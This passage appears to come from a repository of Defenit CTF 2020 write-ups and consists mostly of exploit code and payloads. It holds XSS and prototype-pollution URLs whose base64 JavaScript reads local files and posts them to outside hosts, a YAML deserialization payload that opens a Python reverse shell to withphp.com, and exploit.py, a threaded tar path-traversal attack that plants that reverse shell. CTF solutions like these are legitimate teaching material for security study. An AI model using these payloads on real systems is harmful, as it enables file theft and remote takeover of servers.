54\x6f\x34\x4d\x44\x67\x77\x4c\x7a\x38\x69\x4b\x33\x4a\x6c\x63\x53\x35\x79\x5a\x58\x4e\x77\x62\x32\x35\x7a\x5a\x54\x73\x60\x29\x29\x2f\x2f\x22\x20\x74\x69\x74\x6c\x65\x3d\x22\x2f\x3e\x3c\x69\x6d\x67\x20\x73\x72\x63\x3d\x78\x20\x78\x6e\x65\x72\x72\x6f\x72\x3d\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x20\x73\x70\x61\x6e\x3d\x22\x3c\x78\x22\x20\x6f\x3e\x22';})
111 |
112 |
"
113 |
114 |
115 | http://highlighter.ctf.defenit.kr/read?id=30#({})['__proto__']['__defineGetter__']('foo',function(){return(e\
116 | val(atob(`dmFyIHJlcSA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOwpyZXEub3BlbigiR0VUIiwgImZpbGU6Ly8vcmVkYWN0ZWQvZmxhZyIsIGZhbHNlKTsKcmVxLnNlbmQoKTsKdmFyIHJlcTIgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTsKcmVxMi5vcGVuKCJHRVQiLCAiaHR0cDovL3dpdGhwaHAuY29tOjgwODAvPyIrcmVxLnJlc3BvbnNlLCBmYWxzZSk7CnJlcTIuc2VuZCgpOw`)))})
117 |
118 |
119 | +
120 |
121 | posix(출제자)의 정풀이
122 |
123 | http://highlighter.ctf.defenit.kr/read?id=1#({})['__proto__']['__defineGetter__']('a',function(){return('\x3cstyle\x3e\x3cstyle/\x3e\x3cscript/src=https://accounts.google.com/o/oauth2/revoke?callback=eval(atob(/ZnVuY3Rpb24gZmV0Y2hMb2NhbFJlc291cmNlKHVybCkgeyAgICAgICAgCiAgICBjb25zdCByZXEgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTsgICAgCiAgICByZXEub25sb2FkID0gZnVuY3Rpb24oKSB7CiAgICAgICAgY29uc3QgdGV4dCA9IHJlcS5yZXNwb25zZVRleHQ7ICAKICAgICAgICBmZXRjaCgnaHR0cDovL3A2LmlzOjg4ODgnLCB7Im1ldGhvZCI6ICJQT1NUIiwgImJvZHkiOiBlbmNvZGVVUkkodGV4dCl9KTsKICAgIH07ICAgIAogICAgcmVxLm9wZW4oJ0dFVCcsIHVybCk7CiAgICByZXEuc2VuZCgpOwp9OwoKZmV0Y2hMb2NhbFJlc291cmNlKCdmaWxlOi8vLycp/.source))\x3e\x3c/script\x3e');})
--------------------------------------------------------------------------------
/2020/Defenit_CTF/web3-tar-analyzer/.COMMAND:
--------------------------------------------------------------------------------
1 | ../.././config.yaml 0000666 0000000 0000000 00000000711 13667127342 012136 0 ustar 0000000 0000000 !!python/object/apply:subprocess.Popen
2 | - !!python/tuple
3 | - python
4 | - -c
5 | - "__import__('os').system(str(__import__('base64').b64decode('cHl0aG9uMyAtYyAiaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoJ3dpdGhwaHAuY29tJyw4MDgwKSk7b3MuZHVwMihzLmZpbGVubygpLDApOyBvcy5kdXAyKHMuZmlsZW5vKCksMSk7IG9zLmR1cDIocy5maWxlbm8oKSwyKTtwPXN1YnByb2Nlc3MuY2FsbChbJy9iaW4vc2gnLCctaSddKTsi').decode()))"
--------------------------------------------------------------------------------
/2020/Defenit_CTF/web3-tar-analyzer/.SET_ADMIN:
--------------------------------------------------------------------------------
1 | ------WebKitFormBoundarykaXkmu40pOE2HHtI
Content-Disposition: form-data; name="file"; filename=".HYPASS"
Content-Type: application/octet-stream

../.././config.yaml                                                                                 0000666 0000000 0000000 00000000064 13666641040 012132  0                                                                                                    ustar                                                                   0000000 0000000                                                                                                                                                                        allow_host: 183.102.145.244
message: Hello foooooo!
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            
------WebKitFormBoundarykaXkmu40pOE2HHtI--

--------------------------------------------------------------------------------
/2020/Defenit_CTF/web3-tar-analyzer/exploit.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import threading
3 | import time
4 | import pickle
5 | import base64
6 | import jsonpickle
7 | import yaml
8 | import subprocess
9 | import tarfile
10 | from copy import deepcopy
11 |
12 | class Gen(object):
13 | def __init__(self, payload):
14 | self.payload = payload
15 | def __reduce__(self):
16 | return subprocess.Popen, (self.payload,)
17 |
18 | class Payload(object):
19 | def __init__(self, cmd):
20 | self.filename = 'config.yaml'
21 | self.cmd = cmd
22 | self.payload = b''
23 |
24 | def yaml_payload(self):
25 | if "\'" in self.cmd or "\"" in self.cmd:
26 | self.payload = base64.b64decode("ISFweXRob24vb2JqZWN0L2FwcGx5OnN1YnByb2Nlc3MuUG9wZW4KLSAhIXB5dGhvbi90dXBsZQogIC0gcHl0aG9uCiAgLSAtYwogIC0gIl9faW1wb3J0X18oJ29zJykuc3lzdGVtKHN0cihfX2ltcG9ydF9fKCdiYXNlNjQnKS5iNjRkZWNvZGUoJw==") + base64.b64encode(bytes(self.cmd, 'utf-8')) + base64.b64decode("JykuZGVjb2RlKCkpKSI=")
27 | else:
28 | self.payload = bytes(yaml.dump(Gen(tuple(self.cmd.split(" ")))), 'utf-8')
29 | self.save_tarfile()
30 |
31 | def save_tarfile(self):
32 | open("../../"+self.filename, "wb").write(self.payload)
33 | fp = tarfile.open(".COMMAND", "w")
34 | fp.add("../.././config.yaml")
35 | fp.close()
36 |
37 | def overwrite_ip() :
38 | headers = {
39 | "Host": "tar-analyzer.ctf.defenit.kr:8080",
40 | "Connection": "keep-alive",
41 | "Cache-Control": "max-age=0",
42 | "Upgrade-Insecure-Requests": "1",
43 | "Origin": "http://tar-analyzer.ctf.defenit.kr:8080",
44 | "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarykaXkmu40pOE2HHtI",
45 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",
46 | "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
47 | "Accept-Encoding": "gzip, deflate",
48 | "Accept-Language": "ko,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-CN;q=0.6,la;q=0.5,und;q=0.4,lb;q=0.3,vi;q=0.2"
49 | }
50 | requests.post("http://tar-analyzer.ctf.defenit.kr:8080/analyze", headers=headers, data=overwrite_ip_data)
51 | #print("overwrite admin ip!", flush=True)
52 |
53 | def overwrite_command() :
54 | headers = {
55 | "Host": "tar-analyzer.ctf.defenit.kr:8080",
56 | "Connection": "keep-alive",
57 | "Cache-Control": "max-age=0",
58 | "Upgrade-Insecure-Requests": "1",
59 | "Origin": "http://tar-analyzer.ctf.defenit.kr:8080",
60 | "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryLYTyAuNetbeGL9cf",
61 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",
62 | "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
63 | "Accept-Encoding": "gzip, deflate",
64 | "Accept-Language": "ko,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-CN;q=0.6,la;q=0.5,und;q=0.4,lb;q=0.3,vi;q=0.2"
65 | }
66 | requests.post("http://tar-analyzer.ctf.defenit.kr:8080/analyze", headers=headers, data=cmd_data)
67 | #print("overwrite command!", flush=True)
68 |
69 | def execute_command() :
70 | headers = {
71 | "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
72 | "Accept-Encoding": "gzip, deflate",
73 | "Accept-Language": "ko,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-CN;q=0.6,la;q=0.5,und;q=0.4,lb;q=0.3,vi;q=0.2",
74 | "Cache-Control": "no-cache",
75 | "Connection": "keep-alive",
76 | "Host": "tar-analyzer.ctf.defenit.kr:8080",
77 | "Pragma": "no-cache",
78 | "Upgrade-Insecure-Requests": "1",
79 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
80 | }
81 | print(requests.get("http://tar-analyzer.ctf.defenit.kr:8080/admin", headers=headers).text)
82 |
83 | def set_command(cmd) :
84 | payload = Payload(cmd)
85 | payload.yaml_payload()
86 |
87 |
88 | overwrite_ip_data = open(".SET_ADMIN", "r").read()
89 | overwrite_ip_data = base64.b64decode(overwrite_ip_data.encode()).decode()
90 | cmd_data = b'------WebKitFormBoundaryLYTyAuNetbeGL9cf\r\nContent-Disposition: form-data; name="file"; filename=".COMMAND"\r\nContent-Type: application/octet-stream\r\n\r\n' + open(".COMMAND", "rb").read() + b'\r\n------WebKitFormBoundaryLYTyAuNetbeGL9cf--\r\n'
91 | cmd_data = cmd_data.decode()
92 |
93 |
94 | my_host = 'withphp.com'
95 | my_port = 8080
96 | reverse_shell = """import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('{}',{}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);""".format(my_host, my_port)
97 |
98 | set_command("python3 -c \"%s\""%(reverse_shell))
99 |
100 | th1, th2, th3 = [], [], []
101 |
102 | for i in range(100) :
103 | th1.append(threading.Thread(target=overwrite_ip, args=()))
104 | th2.append(threading.Thread(target=overwrite_command, args=()))
105 | th3.append(threading.Thread(target=execute_command, args=()))
106 |
107 | for i in range(100) :
108 | th1[i].start()
109 | th2[i].start()
110 | th3[i].start()
111 |
112 |
--------------------------------------------------------------------------------
/2020/Defenit_CTF/web4-babyjs/exploit.py:
--------------------------------------------------------------------------------
1 | print(__import__('requests').post("http://babyjs.ctf.defenit.kr/", data={"content[]": "{{FLAG}}"}).text)
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # CTF Write ups
2 |
--------------------------------------------------------------------------------